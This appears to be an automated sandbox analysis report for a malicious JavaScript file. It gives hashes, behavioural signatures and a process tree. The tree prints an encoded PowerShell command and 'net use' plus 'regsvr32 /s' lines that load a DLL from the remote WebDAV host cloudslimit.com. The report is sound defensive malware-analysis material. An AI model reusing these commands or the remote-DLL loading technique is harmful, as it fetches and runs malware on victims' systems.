Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21-08-2024 14:09
Static task
static1
Behavioral task
behavioral1
Sample
5741beabdd954aa276128bb17f8f6a923f120e54e8e13eed3adfcc7779d17a45.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
5741beabdd954aa276128bb17f8f6a923f120e54e8e13eed3adfcc7779d17a45.js
Resource
win10v2004-20240802-en
General
-
Target
5741beabdd954aa276128bb17f8f6a923f120e54e8e13eed3adfcc7779d17a45.js
-
Size
13KB
-
MD5
a1339b6e97ef39a9bb1f658e877a2bf9
-
SHA1
2c4817712deeca8f4d85b2a255157cbf2b4c7a9c
-
SHA256
5741beabdd954aa276128bb17f8f6a923f120e54e8e13eed3adfcc7779d17a45
-
SHA512
59fa8f485c4080b71562b8649fb211b91c4a7a4bccdccc953160fb9895e37b9f6be480d874abf79bdbc970990d229456d4b7745517ddd27667a87c3fd9043fb4
-
SSDEEP
96:yBF230q+HCd8XmfDM7ayPAcH2oAH3sHWtkXfhD/qfhevM9EKE3BE8WIyUD8U:yBYkZC2Wfw7XRWcfRqfw8EKs2UAU
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation wscript.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1392 powershell.exe 1392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1392 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1904 wrote to memory of 1392 1904 wscript.exe 84 PID 1904 wrote to memory of 1392 1904 wscript.exe 84 PID 1392 wrote to memory of 2636 1392 powershell.exe 86 PID 1392 wrote to memory of 2636 1392 powershell.exe 86 PID 1392 wrote to memory of 2408 1392 powershell.exe 87 PID 1392 wrote to memory of 2408 1392 powershell.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\5741beabdd954aa276128bb17f8f6a923f120e54e8e13eed3adfcc7779d17a45.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA0ADgANQA2ADkAMQA1ADAAMgA0ADMAOQA1AC4AZABsAGwA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2636
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\4856915024395.dll3⤵PID:2408
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82